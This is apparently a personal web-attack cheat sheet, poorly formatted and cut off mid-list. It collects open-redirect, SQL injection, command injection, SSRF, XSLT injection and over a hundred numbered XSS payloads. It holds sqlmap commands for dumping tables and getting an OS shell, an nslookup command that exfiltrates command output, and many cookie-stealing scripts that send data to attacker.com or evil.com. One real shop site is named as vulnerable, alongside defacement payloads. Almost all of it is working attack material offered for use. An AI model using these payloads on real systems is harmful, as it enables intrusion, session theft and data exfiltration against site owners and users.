?url=http://{target}?url=https://{target}?next=http://{target}?next=https://{target}?url=https://{target}?url=http://{target}?url=//{target}?url=$2f%2f{target}?next=//{target}?next=$2f%2f{target}?url=//{target}?url=$2f%2f{target}?url=//{target}/redirect/{target}/cgi-bin/redirect.cgi?{target}/out/{target}/out?{target}/out?/{target}/out?//{target}/out?/\{target}/out?///{target}?view={target}?view=/{target}?view=//{target}?view=/\{target}?view=///{target}/login?to={target}/login?to=/{target}/login?to=//{target}/login?to=/\{target}/login?to=///{target}Open Redirect Payloads by @cujanovic
https://github.com/cujanovic/Open-Redirect-Payloads
Open Redirect Paramters by @fuzzdb-project
https://github.com/fuzzdb-project/fuzzdb/blob/master/attack/redirect/redirect-urls-template.txt
SQLI
Akamai Kona Bypass
MIDinstead ofSUBSTRINGLIKEinstead of=/**/instead of aspaceCURRENT_USERinstead ofCURRENT_USER()"instead of'
Final example:
444/**/OR/**/MID(CURRENT_USER,1,1)/**/LIKE/**/"p"/**/#[+] Union Based SQL Injection
' or 1=1#
1' ORDER BY 10#
1' UNION SELECT version(),2#
1' UNION SELECT version(),database()#
1' UNION SELECT version(),user()#
1' UNION ALL SELECT table_name,2 from information_schema.tables#
1' UNION ALL SELECT column_name,2 from information_schema.columns where table_name = "users"#
1' UNION ALL SELECT concat(user,char(58),password),2 from users#
sqlmap --url="<url>" -p username --user-agent=SQLMAP --threads=10 --eta --dbms=MySQL --os=Linux --banner --is-dba --users --passwords --current-user --dbs
==============SQL injection:
Resources: https://portswigger.net/web-security/sql-injection
Web application hackers handbook by Pinto and Stuttard
SQL injection Cheat Sheets: https://portswigger.net/web-security/sql-injection/cheat-sheet
http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet
General:
use single quotation mark ' to test for sql vulnerabiltiy
use double dash to terminate the query --
On MySQL the -- sequence must be followed by a space. Alternatively, # can be used
Submitting the single quote character ' and looking for errors or other anomalies.
Submitting some SQL-specific syntax that evaluates to the base (original) value of the entry point, and to a different value, and looking for systematic differences in the resulting application responses.
Submitting Boolean conditions such as OR 1=1 and OR 1=2, and looking for differences in the application's responses.
Submitting payloads designed to trigger time delays when executed within an SQL query, and looking for differences in the time taken to respond.
Submitting OAST payloads designed to trigger an out-of-band network interaction when executed within an SQL query, and monitoring for any resulting interactions.
=== Basic SQL injection:
e.g. Login Form: username=administrator'-- and arbitrary password
username=administrator'-- -
password=pw' OR 1=1 --
password=pw' OR 1=1 -- -
password=pw' OR 'b'='b
Try to register a user like username=administrator' OR 1=1 --
Or username=administrator' OR 1=1 -- -
in this case check for second-order sql injections
=== UNION SQL injection:
The union keyword lets you execute additional select statements:
--> Conditions:
You must return the same number of columns as the original query
The results of the injected query must match the data type of the original query.
1. --> Determine the number of columns:
1.1. Method:
Inject an ORDER BY n-- clause until an error occurs
--> ' ORDER BY 1-- --> NO ERROR
--> ' ORDER BY 2-- --> NO ERRROR
--> ' ORDER BY 3-- --> ERROR --> 2 columns (Error may be an SQL error, generic message or an empty result)
1.2. Method:
Querying different numbers of NULL values
--> UNION SELECT NULL-- --> ERROR --> more than 1 column
--> UNION SELECT NULL, NULL-- --> NO ERROR (maybe an additonal row of NULL values is being returned)
--> DIFFERENT ERROR (may return a distinct error message)
However, the same error message as in the 1st & 3rd test could appear. --> This situation makes the method ineffective
--> UNION SELECT NULL, NULL, NULL-- --> ERROR --> less than 3 columns -> 2 columns
NOTES: In Oracle databases a SELECT statement needs to have a FROM clause
--> using the built in DUAL table --> ' UNION SELECT NULL FROM DUAL--.
2. --> Determine the data type of a column:
2.1. Assuming we want to return a String -> Determine which column can represents string value
Assuming that we determined that the query returns 2 coulums
--> ' UNION SELECT 'a',NULL--
--> ' UNION SELECT NULL,'a'--
--> If an error occurs the datatype is not compatible with the coulumn
3. --> Retrieving data (adhere to number of columns and data type):
3.1. ' UNION SELECT <columname>, <columnname> FROM <table>--
' UNION SELECT username, password FROM usertable--
3.2. Retrieving database information (adhere to number of columns and data type):
-Microsoft, MySQL: SELECT @@version
-Oracle: SELECT * FROM v$version
-PostgreSQL: SELECT version()
3.3. Retrieving content information from NON-Oracle databases (adhere to the number of columns and data type):
SELECT TABLE_NAME FROM information_schema.tables
--> Columns to select: TABLE_CATALOG TABLE_SCHEMA TABLE_NAME TABLE_TYPE
SELECT COLUMN_NAME FROM information_schema.columns WHRER TABLE_NAME = '<table_name>'
--> Columns to select: TABLE_CATALOG TABLE_SCHEMA TABLE_NAME COLUMN_NAME DATA_TYPE
Retrieving content information from Oracle databases (adhere to the number of columns and data type):
SELECT table_name FROM all_tables
SELECT * FROM all_tab_columns WHERE table_name = 'USERS'
SELECT column_name, table_name FROM cols
3.4. Concatenate values in a single column
' UNION SELECT username || '~' || password FROM users--
=== Blind SQL injection:
The application contains SQL injection vulnerabilities but does not return any results of the query or error messages
=== Using SQLMAP:
1. Store the request to a file using Burp (e.g. file called login.req)
2. Test for vulnerable parameters in request
sqlmap -r login.req --level=5 --risk=3 --threads=10
3. If vulnerable parameter is found:
3.1 Enumerate database tables:
sqlmap -r login.req --level=5 --risk=3 --threads=10 --tables
3.2 Retrieve Tables:
sqlmap -r login.req --level=5 --risk=3 -T <found_table_name> --dump
3.3 Get Shells:
3.3.1 SQL shell
sqlmap -r login.req --level=5 --risk=3 --sql-shell
3.3.2 System shell
sqlmap -r login.req --level=5 --risk=3 --os-shell
3.3.3 Other shell parameters
sqlmap -help|grep shell
==============Command injection:
Resources: https://portswigger.net/web-security/os-command-injection
https://www.owasp.org/index.php/Command_Injection
https://www.owasp.org/index.php/Testing_for_Command_Injection_(OTG-INPVAL-013)
characters for command separation:
&
&&
|
||
only on Unix-based systems:
;
Newline (0x0a or \n)
On Unix-based systems, also use the following to perform inline execution of an injected command within the original command:
` injected command `
$( injected command )
--> Useful Commands (not blind OR using > to output in a readable file):
Win & unix: whoami
Lin cat /etc/passwd
Win type C:\boot.ini
Lin ifconfig
Win ipconfig
Lin uname -a
Win ver
--> Useful commands when blind:
ping -c 10 myip and monitor interface
ping -c 10 127.0.0.1 and wait for delay
nslookup mydomain.com and monitor the request (may use a subdomain to differentiate between requests)
nslookup `whoami`.mydomain.com to exfiltrate command outputBlogs
[http://lab.mediaservice.net/notes_more.php?id=MSSQL](http://lab.mediaservice.net/notes_more.php?id=MSSQL
SSRF
http://0177.1/http://0x7f.1/http://127.000.000.1https://520968996Note: The latter can be calculated using http://www.subnetmask.info/
Exotic Handlers
gopher://, dict://, php://, jar://, tftp://IPv6
http://[::1]http://[::]Wildcard DNS
10.0.0.1.xip.io
www.10.0.0.1.xip.io
mysite.10.0.0.1.xip.io
foo.bar.10.0.0.1.xip.ioLink: http://xip.io
10.0.0.1.nip.io
app.10.0.0.1.nip.io
customer1.app.10.0.0.1.nip.io
customer2.app.10.0.0.1.nip.io
otherapp.10.0.0.1.nip.ioLink: http://nip.io
AWS EC2 Metadata
http://169.254.169.254/latest/meta-data/ http://169.254.169.254/latest/meta-data/local-hostnamehttp://169.254.169.254/latest/meta-data/public-hostnameIf there is an IAM role associated with the instance, role-name is the name of the role, and role-name contains the temporary security credentials associated with the role [...]
Link: http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html (includes a comprehensive Instance Metadata Categories table)
XSLT Injection
Backend infos
<?xml version="1.0" encoding="UTF-8"?>
<html xsl:version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">
<body>
<xsl:text>xsl:vendor = </xsl:text><xsl:value-of select="system-property('xsl:vendor')"/><br/>
<xsl:text>xsl:version = </xsl:text><xsl:value-of select="system-property('xsl:version')"/><br/>
</body>
</html>Injecting in PHP
<?xml version="1.0" encoding="UTF-8"?>
<html xsl:version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">
<body>
<xsl:value-of name="bugbounty" select="php:function('phpinfo')"/>
</body>
</html>XSS
##XSS Bypass by Url Encoding
************Vulnerble : https://www.nobullproject.com/collections/shop?q=
XSS with Image Injection :)
%3Cimg%20src%3Dhttps%3A%2F%2Fcdn.pixabay.com%2Fanimation%2F2023%2F09%2F07%2F21%2F54%2F21-54-00-174_512.gif%20%3E
%3Cmarquee%3E%3Cimg%20src%3D%22https%3A%2F%2Fcdn.pixabay.com%2Fanimation%2F2023%2F09%2F07%2F21%2F54%2F21-54-00-174_512.gif%22%20alt%3D%22GIF%22%3E%20Rohit%20is%20the%20real%20Mr.%20Robot%3C%2Fmarquee%3E%0D%0A
Adding Marquee tag :)
%3Cmarquee%3ERohit%20hacked%20this%20website%20using%20xss%3C%2Fmarquee%3E
%3Cmarquee%20style%3D%22font-family%3A%20%27Hack%27%2C%20monospace%3B%20color%3A%20green%3B%22%3ERohit%20hacked%20this%20website%20using%20XSS%3C%2Fmarquee%3E%0D%0A
To check HTMLI --> test
open redirect
%3Cimg%20src%3Dx%20onerror%3D%22window.location.href%3D%27https%3A%2F%2Fwww.youtube.com%2F%40hackwithrohit-new-2k%27%3B%22%3E%0D%0A%0D%0A
https://dencode.com/en/
1. Basic XSS Payloads
These are simple payloads typically used for testing.
<script>alert('XSS')</script>
<svg/onload=alert('XSS')>
<img src=x onerror=alert('XSS')>
<iframe src="javascript:alert('XSS');"></iframe>
<math><mtext><title>1</title><mtext><style><img src=x onerror=alert(1)> // MathML vector
<marquee onstart=alert('XSS')>Test</marquee>
<details open ontoggle=alert('XSS')>Test</details>
<isindex type=image src=1 onerror=alert('XSS')>2. Event Handler-Based Payloads
XSS vectors relying on event attributes.
<img src="x" onerror="alert('XSS')">
<body onload=alert('XSS')>
<input type="button" value="Click" onclick="alert('XSS')">
<div onmouseover="alert('XSS')">Mouse over me</div>
<a href="javascript:alert('XSS')">Click me</a>3. JavaScript Protocol Injection
Injecting via JavaScript URI.
<a href="javascript:alert('XSS')">Click me</a>
<iframe src="javascript:alert('XSS');"></iframe>
<object data="javascript:alert('XSS');"></object>4. HTML Attribute Injection
Payloads placed within an HTML tag’s attribute to break out of the context.
<input type="text" value="XSS" onfocus="alert('XSS')" autofocus>
<form action="test" onsubmit="alert('XSS')"><input type="submit"></form>
<textarea autofocus onfocus="alert('XSS')">Text</textarea>5. SVG and Vector Image Payloads
Leverage vector image formats such as SVG for XSS.
<svg/onload=alert('XSS')>
<svg><desc><![CDATA[<script>alert('XSS')</script>]]></desc></svg>
<svg><foreignObject><body xmlns="http://www.w3.org/1999/xhtml" onload="alert('XSS')"></body></foreignObject></svg>6. Advanced Injection Techniques
Involving bypassing filters or making injections harder to detect.
<svg><script>alert`1`</script></svg> // Using backticks
<script x=">" src="http://attacker.com/xss.js"></script> // Attribute confusion
<iframe srcdoc="<script>alert('XSS')</script>"></iframe> // srcdoc attribute
<script>const alert=window.alert.bind(window);alert('XSS')</script> // JavaScript function binding7. DOM-Based XSS Payloads
Payloads targeting insecure JavaScript code.
<script>document.write('<img src="x" onerror="alert(\'XSS\')">');</script>
<input id="test" oninput="location.href='javascript:alert('+this.value+')'">8. HTML5 and Modern Techniques
Taking advantage of new HTML5 elements.
<video><source onerror="alert('XSS')"></video>
<keygen autofocus onfocus=alert(1)>
<audio src onloadstart=alert(1)>
<meter value=2 min=0 max=10 onmouseover=alert(1)>X</meter>
<output onforminput="alert(1)">X</output>
<progress value=10 max=100 onclick=alert(1)>Progress</progress>9. Malformed Tags or Encoded Bypasses
Use malformed tags or entities to bypass filters.
<scr<script>ipt>alert('XSS')</scr<script>ipt> // Broken up script tag
<script>alert(String.fromCharCode(88,83,83))</script> // Obfuscated alert using char codes
<scr%0ipt>alert('XSS')</scr%0ipt> // Using URL-encoded characters10. URL Parameter-Based XSS
Payloads embedded in the query string.
http://example.com/index.php?name=<script>alert('XSS')</script>
http://example.com/?q=%3Cscript%3Ealert(document.cookie)%3C/script%3E
javascript:eval("alert('XSS')")11. Cookie Theft via XSS
Using JavaScript to steal cookies.
<script>document.location='http://attacker.com/?cookie='+document.cookie</script>
<img src="x" onerror="fetch('http://attacker.com?cookie='+document.cookie)">
<script>new Image().src="http://attacker.com/"+document.cookie;</script>12. XSS in Contexts Other Than HTML
Injected into JSON, XML, or other non-standard contexts.
{"name":"<script>alert('XSS')</script>"}
<username><![CDATA[<script>alert('XSS')</script>]]></username>13. AngularJS Template Injection
Leverage AngularJS templating system.
{{constructor.constructor('alert(1)')()}}
{{'a'.constructor.prototype.charAt=[].join;$eval('alert(1)')}}14. Exploiting InnerHTML Vulnerabilities
Common with dynamic JavaScript rendering using .innerHTML.
<script>document.body.innerHTML='<img src=x onerror=alert(1)>';</script>
<div id="div1" onclick="document.getElementById('div1').innerHTML='<img src=x onerror=alert(1)>'">Click me</div>15. XSS Payloads Exploiting CSS
Using CSS injection to trigger JavaScript.
<style>@keyframes x{}</style><div style="animation-name:x" onanimationstart="alert(1)"></div>
<style>body{background:url('javascript:alert(1)')}</style>16. Event Handler Abusing HTML5 Elements
New event handlers introduced with HTML5.
<input onblur="alert('XSS')" autofocus>
<body ononline="alert('XSS')">
<select onchange="alert('XSS')"><option>1</option><option>2</option></select>17. HTML Comment Injection
Attempting XSS via HTML comment manipulation.
<!--<script>alert(1)</script> -->
<!-- Comment trick --><script>alert(1)</script>18. Multipart Payloads and Bypasses
Payloads spread across multiple elements to evade WAFs and filters.
<scr<script>ipt>alert('XSS')</scr<script>ipt>19. Flash and VML Payloads
Exploiting legacy technologies.
<vmlframe src="javascript:alert('XSS')"></vmlframe>
<embed src="data:image/svg+xml;base64,..." allowScriptAccess="always"></embed>20. Stored XSS Payloads
Used for persistence in databases.
<script>fetch('http://attacker.com', {method: 'POST', body: document.cookie})</script>
<div data-xss="<img src=x onerror=alert('XSS')>"></div>
<script>localStorage.setItem('payload','<img src=x onerror=alert(1)>');</script>21. Using Fetch or XMLHttpRequest
Stealing information via web requests.
<script>fetch('http://evil.com',{method:'POST',body:document.cookie})</script>
<script>var xhr=new XMLHttpRequest();xhr.open('GET','http://attacker.com',true);xhr.send(document.cookie);</script>22. Blind XSS Payloads
Blind XSS payloads are often used when you do not see the immediate result but need to send data to an external server for verification.
<script>new Image().src="http://attacker.com/?cookie="+document.cookie;</script>
<img src="x" onerror="fetch('http://attacker.com/blindxss?data='+document.cookie)">
<svg/onload="fetch('http://attacker.com?xss='+btoa(document.cookie))">
<iframe src="javascript:fetch('http://attacker.com/blind?cookie='+encodeURIComponent(document.cookie))"></iframe>
<script>document.location='http://attacker.com/blind/?cookie='+document.cookie</script>23. Base64 Encoded Payloads
Encoding the payload in Base64 to evade detection.
<svg><script>eval(atob('YWxlcnQoMSk='))</script></svg> // "alert(1)" in Base64
<img src="data:image/svg+xml;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoJ1hTUycpPg=="> // Base64 encoded payload with alert('XSS')
<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></iframe> // Base64 HTML with alert(1)24. URL Encoding and Double Encoding
Using URL encoding to obfuscate scripts and bypass filters.
%3Cscript%3Ealert('XSS')%3C%2Fscript%3E // <script>alert('XSS')</script>
<iframe src="javascript%3Aalert%28%27XSS%27%29"></iframe>
<img src="javascript%3A%2520alert%28%27XSS%27%29">25. UTF-16/Unicode Encoding
Payloads that use alternative character encodings to bypass security.
<script>alert('\u0041\u0042\u0043')</script> // Unicode for "ABC"
<script>alert(String.fromCharCode(88,83,83))</script> // XSS in character codes
<svg onload=\u0061\u006c\u0065\u0072\u0074(1)> // Unicode for alert(1)26. Polyglot XSS Payloads
Polyglot payloads can execute as HTML, JavaScript, CSS, or other contexts to ensure broad applicability.
"><img src=x onerror=alert(1)>'"><script>alert(1)</script>
"><svg onload="alert('XSS')"></svg> --><p " --><svg onload=alert(1)></svg>
'";alert(String.fromCharCode(88,83,83))//</script>27. Using Non-Printable Characters
Use control characters to bypass filters that do not handle them properly.
<svg/onload=\x0Aalert(1)>
<script>alert('XSS')</script>\x0B // Non-printable characters28. Mixed Context Injection
Payloads that abuse JavaScript, HTML, and CSS mixed together.
<style>@keyframes x{}</style><div style="animation-name:x" onanimationstart="alert(1)"></div>
"><style>body{background:url("javascript:alert('XSS')")}</style>
"><iframe src="javascript:`/*--><svg onload=alert(1)><!--*/`"></iframe>29. HTML5 Cross-Browser Quirks
Exploiting specific quirks across different HTML5 elements and attributes.
<object type="image/svg+xml" data="data:image/svg+xml,<svg xmlns='http://www.w3.org/2000/svg'><script>alert('XSS')</script></svg>"></object>
<video><source onerror="alert('XSS')"></video>
<xss id="test"/x="><img src=x onerror=alert(1)>">
<div draggable="true" ondrag="alert('XSS')">Drag me</div>30. JavaScript Prototype Pollution
Using prototype pollution to trigger JavaScript execution.
<script>
Object.prototype.x = function() {alert('XSS')};
[].x();
</script>31. Data URIs for XSS Payload Delivery
Using data URIs to deliver XSS payloads.
<img src="data:image/svg+xml;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+">
<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></iframe>
<a href="data:text/html,<script>alert('XSS')</script>">Click me</a>32. Null Byte Injection
Use null bytes to terminate strings early or confuse parsers.
<script\x00>alert('XSS')</script>
<img src="x" onerror="alert(String.fromCharCode(0x00))">33. XSS via Metadata Tags
Using <meta> tags in certain scenarios to trigger XSS.
<meta http-equiv="refresh" content="0; url=javascript:alert(1)">
<meta charset="utf-7"><script>alert('XSS')</script> // Works with old IE browsers34. XSS Payloads Using Document and Window
Using JavaScript window and document objects to extract sensitive information.
<script>document.location='http://attacker.com?cookie='+document.cookie</script>
<script>window.open('http://attacker.com/?cookie='+document.cookie)</script>
<script>new Image().src='http://attacker.com/log?key='+localStorage.getItem('user_key');</script>35. XSS Using JavaScript Comments
Comment-based payloads to make detection more difficult.
<script>/*alert('XSS')*/alert(1)//</script>
<!--<img src="x" onerror="alert('XSS')">-->
<script>//<!--alert('XSS')</script>36. Blind XSS in Headers
Often useful in APIs where headers are rendered directly in logs.
User-Agent: "><script>alert('XSS')</script>
Referer: javascript:alert('XSS')
Content-Type: text/html;charset=UTF-737. SVG and XML Entities Abuse
Payloads that leverage SVG and XML entities.
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg xmlns="http://www.w3.org/2000/svg" onload="alert('XSS')"></svg>38. NoScript Contexts (Injection in Non-Script Tags)
Inject XSS payloads in attributes that are not meant for scripts.
<math xmlns="http://www.w3.org/1998/Math/MathML"><mtext><title><![CDATA[<img src="x" onerror="alert(1)">]]></title></mtext></math>
<div id="div1" onclick="document.getElementById('div1').innerHTML='<img src=x onerror=alert(1)>'">Click me</div>39. XSS in Template Engines
Payloads designed to abuse popular web template engines (e.g., JSP, Thymeleaf, Jinja).
${@java.lang.Runtime@getRuntime().exec('calc')}
{{constructor.constructor('alert(1)')()}}
#{T(java.lang.Runtime).getRuntime().exec('touch /tmp/pwned')}40. XSS Using CSS (Style Attribute)
CSS injection leveraging HTML attributes to trigger JavaScript.
<div style="background-image:url(javascript:alert('XSS'))">Test</div>
<style>body{color:expression(alert(1))}</style> // Obsolete in newer versions of IE41. XSS via XPath Injection
XPath injections with inline JavaScript.
<name>
<![CDATA[<script>alert('XSS')</script>]]>
</name>42. Obfuscated JavaScript Techniques
Using obfuscation to evade detection, such as self-executing functions.
<svg><script>(function(){alert(1)})()</script></svg>
<script>eval('al'+'ert(1)')</script>
<script>Function('ale'+'rt(1)')()</script>
<script>$=String;$($('al'+'ert(1)'))()</script>43. Filter Bypass Techniques
Using different encodings and bypass tricks to avoid typical XSS filters.
<scr%0ipt>alert(1)</scr%0ipt>
<script>al\ert(1)</script> // Bypassing simplistic "alert" filter
<scr<script>ipt>alert('XSS')</scr<script>ipt>44. WAF Bypass Techniques with Modified Syntax
These techniques leverage different ways to write payloads that may not match a WAF's strict rules.
<script>alert`1`</script> // Using backticks instead of parentheses
<script>alert(1)</script> // HTML entity encoding
<script src=data:text/javascript,alert(1)></script> // Data URI usage
<script>self </script> // Using property lookup
<script>this </script> // Concatenation in function name
<svg/onload="top "> // Obfuscation through numbers45. HTML Entity and Mixed Encoding Techniques
Using HTML entities and mixed character encoding to slip past WAF rules.
<scr<script>ipt>alert(String.fromCharCode(88,83,83))</scr<script>ipt>
<img src=x onerror=alert(1)>
<svg/onload=alert(1)>
<script>alert('\x58\x53\x53')</script> // Hexadecimal encoding
<iframe src="javascript:alert(1)"></iframe> // Colon and parentheses HTML encoding46. Bypassing Common HTML Attribute Restrictions
Using unconventional characters, malformed attributes, and malformed tags.
<img sRc=X oNERror=alert(1)> // Capital letters to bypass case-sensitive filters
<img src=1 href=1 onerror='javascript:/*--></script><script>alert(1)//'>
<sVg><scRiPt>alert(1)</sCriPt></svG> // SVG combined with scripting to confuse filters
<form><button formaction="javascript:alert(1)">Click Me</button></form> // Button with formaction
<video><source onerror="alert(1)"></video>47. Random Whitespaces and Newline Characters
Adding arbitrary spaces, newlines, or invisible characters to bypass WAF pattern matching.
<scr ipt>alert(1)</scr ipt>
<script
>alert('XSS')</script>
<svg onload="aler
t(1)">
<IMG SRC=javascript: alert('XSS')> // Whitespace between "javascript:" and "alert"
<input value="``onmouseover='alert(1)'">48. In-line JavaScript Comments to Break Patterns
Using in-line comments to disrupt typical WAF signatures.
<script>/*alert*/(1)</script>
<script>/*-alert-*/(1)</script>
<script>self['ale'+'rt']/*alert*/(1)</script>
<svg/onload="al/*comment*/ert(1)">49. Broken or Split Tags
Splitting important parts of the script to confuse pattern matching.
<scr<script>ipt>alert('XSS')</scr<script>ipt>
<svg><scri</svg>pt>alert(1)</script>
<scri%00pt>alert('XSS')</scri%00pt> // Null byte insertion
<scri</scri>pt>alert('XSS')</script> // Closing the script in unexpected ways50. WAF Bypass with Improper Unicode Handling
Using mixed character sets that exploit improper Unicode parsing in the WAF.
<scrіpt>alert(1)</scrіpt> // Using a Cyrillic 'і' instead of the Latin 'i'
<scrīpt>alert(1)</scrīpt> // Unicode look-alike characters
<iframe src="javas\u0063ript:alert(1)"></iframe> // Unicode escape51. Non-Standard Protocol Usage
Leveraging non-standard protocols and pseudo-protocols.
<iframe src="javascript:alert(1)"></iframe>
<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">Click</a> // Data URI with base64 encoded JavaScript
<img src="javascript:alert(1)"> // Usage of `javascript:` in image src
<img src="vbscript:msgbox('XSS')"> // VBScript (in very old IE versions)52. JavaScript Protocol Wrapping
Bypass using different JavaScript wrappers and encodings.
<a href="java	script:alert(1)">Click here</a> // Tab character between "javascript"
<iframe src="javascript:/*-alert(1)"></iframe>
<svg><script>this.onerror=alert;throw 1</script></svg>
<a href="java
script:alert(1)">Click here</a> // Carriage return53. HTML 5 and SVG Content Bypasses
Exploiting new HTML5 features and SVG quirks to slip through WAFs.
<details open ontoggle="alert(1)">Click Me</details>
<svg><use xlink:href="data:image/svg+xml,<svg xmlns='http://www.w3.org/2000/svg'><script>alert(1)</script>"></use></svg>
<meter value="2" min="0" max="10" onmouseover="alert(1)">2</meter>
<foreignObject><body onload=alert(1)></body></foreignObject> // In SVG context54. CSS and Style Injection Techniques
Injecting CSS to trigger JavaScript or abusing the style tag.
<div style="width:expression(alert(1))">X</div> // Internet Explorer-specific CSS
<x style="behavior:url(#default#time2)" onbegin="alert(1)"> // IE behaviors
<style>@import 'javascript:alert(1)';</style> // Leveraging CSS @import
<div style="background:url(javascript:alert(1))">CSS Injection</div>55. Using HTML Encoding Bypass
Combining multiple encoding methods to confuse security filters.
<script>alert(1)</script> // Decimal encoding mixed in a script
<img src='x' oneۮrror=alert(1)> // Mixing hex and text encoding
<script>alert(1)</script> // Mixed with hexadecimal for tags56. JavaScript Bypass Using Alternate Methods and Properties
Using alternate ways to execute JavaScript without directly invoking alert or script.
<script>top </script> // Constructing alert dynamically
<iframe src="javascript:document.body.appendChild(document.createElement('script')).src='//attacker.com/xss.js';"></iframe>
<script>fetch('http://attacker.com/?'+document.cookie)</script>
<script>setTimeout('alert(1)',0)</script>
<svg onload="[].map.call('XSS', eval)"> // Abuse `eval` with `map`57. Use of JavaScript Special Characters and Keyword Aliases
Avoiding keyword-based filters by using JavaScript's flexible syntax.
<script>self</script> // Evaluates to alert(1)
<script>top </script> // Alert with numeric trick
<svg onload="confirm.call(this,'XSS')"> // Using alternative function call like `confirm`58. Bypass Using HTML5 Interactive Elements
Injecting XSS vectors within interactive HTML5 elements.
<form><input type="text" value="XSS" autofocus onfocus="alert(1)"></form>
<meter value="0.5" onmouseover="alert(1)">0.5</meter>
<output onforminput="alert(1)">XSS</output>
<keygen autofocus onfocus=alert(1)> // Exploiting deprecated keygen tag59. Self Executing JavaScript Functions
Using self-executing anonymous functions to trigger XSS.
<script>(function(){alert(1)})();</script>
<script>(()=>alert(1))()</script>
<script>((()=>alert(1)))()</script>60. Double URL-Encoded JavaScript Payloads
%253Cscript%253Ealert('XSS')%253C%252Fscript%253E // Double encoding to bypass WAFs61. Fragment Identifier Injection
<a href="http://example.com/#<script>alert(1)</script>">Click Me</a> // Injecting JavaScript through fragments62. Hash Character (#) to Bypass Filters
<script#>alert(1)</script#> // Bypass some HTML parsers63. JavaScript Event in Anchor Tag Attribute
<a href="#" onclick="javascript:alert('XSS')">Click</a>64. Image src Attribute Using JavaScript URL Scheme
<img src="javascript:alert('XSS')">65. Malformed Tags with Missing Closure
<script>alert('XSS')66. Exploiting Frame Attributes
<iframe src="javascript:alert('XSS')"></iframe>67. Inline JavaScript Execution with JSFiddle URL
<script src="https://jsfiddle.net/user/external.js"></script> // External script load68. JavaScript Execution Through HTML-Encoded Breaks
<script>alert('line1')\u000Aalert('line2')</script>69. XSS Injection in JavaScript URL Redirect
<a href="javascript:document.location='http://attacker.com/?cookie='+document.cookie">Redirect</a>70. Using JavaScript Constructors for Execution
<script>alert.constructor('alert(1)')()</script>71. Polyglot Payload for Both JavaScript and JSON
{"name":"</script><script>alert(1)</script>"}72. Abuse of the <noscript> Tag
<noscript><img src="x" onerror="alert(1)"></noscript>73. Inline Style with JavaScript Execution
<div style="width:expression(alert(1))">XSS</div> // Only effective in older IE versions74. Encoded JavaScript URI Manipulation
<a href="javascript:alert(1)">Click</a>75. SVG Injection with Script Element
<svg><script>alert(1)</script></svg>76. Abuse of ARIA Attributes for Injection
<div role="alert" aria-live="assertive" onfocus="alert(1)" tabindex="0">Focus me</div>77. Abuse of Onscroll Event
<div onscroll="alert(1)">Scroll me</div>78. Injecting JavaScript into Template Literals
<script>let a = `</script><script>alert(1)</script>`;</script>79. Dynamic Script Injection Using Blob URLs
<script>let blob = new Blob(['alert(1)'], {type: 'text/javascript'}); let url = URL.createObjectURL(blob); document.body.appendChild(Object.assign(document.createElement('script'), {src: url}));</script>80. Abuse of window.name
<script>window.name = '<img src="x" onerror="alert(1)">';</script>81. Using <object> Tag for JavaScript Execution
<object data="javascript:alert('XSS')"></object>82. Using <embed> Tag for XSS
<embed src="javascript:alert('XSS')">83. Injection via Path Traversal in URLs
http://example.com/%3Cscript%3Ealert(1)%3C/script%3E84. Template Injection in Handlebars.js
{{#with "constructor"}}{{this.alert "XSS"}}{{/with}}85. Injection Using AngularJS ng-csp Bypass
{{constructor.constructor('alert(1)')()}}86. Abuse of Event Listeners to Inject JavaScript
<button id="btn">Click Me</button><script>document.getElementById('btn').addEventListener('click', function() { alert(1); });</script>87. HTML Audio with Malformed Tag
<audio src="javascript:alert(1)">Sound</audio>88. CSS Import URL with JavaScript URI
@import url('javascript:alert(1)');89. Exploiting InnerHTML Assignment in JavaScript
<script>document.body.innerHTML = '<img src=x onerror=alert(1)>';</script>90. SVG Animation Injection
<svg><animate onbegin="alert(1)"></animate></svg>91. Exploiting HTML <isindex> Element
<isindex action="javascript:alert('XSS')">92. HTML <listing> Tag Abuse
<listing oncopy=alert(1)>Hello</listing>93. Targeting Cross-Origin Redirects with XSS Payloads
<a href="//attacker.com/"><img src="javascript:alert(1)"></a>94. Abuse of innerText JavaScript Property
<script>document.querySelector('body').innerText += '<img src=x onerror=alert(1)>';</script>95. Use of <bgsound> for XSS Execution (IE)
<bgsound src="javascript:alert(1)">96. Exploit CSS background for XSS
<div style="background:url(javascript:alert('XSS'))">CSS Background</div>97. Leverage window.location for Redirection-Based XSS
<script>window.location = 'javascript:alert(1)';</script>98. Clickjacking Using XSS Payloads
<iframe src="http://example.com/" style="opacity:0;" onload="alert(1)"></iframe>99. XSS Injection Using <keygen>
<keygen autofocus onfocus=alert(1)>100. Inline JavaScript URL with Percent Encoding
<a href="javascript%3Aalert('XSS')">Click Me</a>101. Obfuscate Payload Using String Concatenation
<script>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</script>102. CSS Selector Exploit in JavaScript
<style>div::after {content: "XSS";}</style>
<script>document.querySelector("div").onmouseenter = () => alert(1);</script>103. Abuse of <applet> Tag
<applet code="javascript:alert(1)"></applet> // Deprecated but relevant in very old browsers104. JavaScript Injection Through Query Parameter
http://example.com/?param=<script>alert('XSS')</script>105. SVG Use with JavaScript URI
<svg><use xlink:href="javascript:alert(1)"></use></svg>106. Exploit via HTML Form Input Value
<form><input value="XSS" onfocus="alert(1)" autofocus></form>107. Using location.hash to Inject XSS
<script>location.hash = "javascript:alert(1)";</script>108. Injection Using JavaScript .onload Event Handler
<img src="x" onload="alert(1)">109. Using CSS position:fixed with JavaScript URL> [!warning]
<a style="position:fixed;" href="javascript:alert(1)">Fixed</a>110. Data Attributes for Inline JavaScript
<button data-action="javascript:alert(1)">Click</button>111. Execution Using <menu> Tag
<menu type="context" id="menu"><menuitem label="Click me" onclick="alert(1)"></menuitem></menu>112. Combining JavaScript and CSS in <svg>
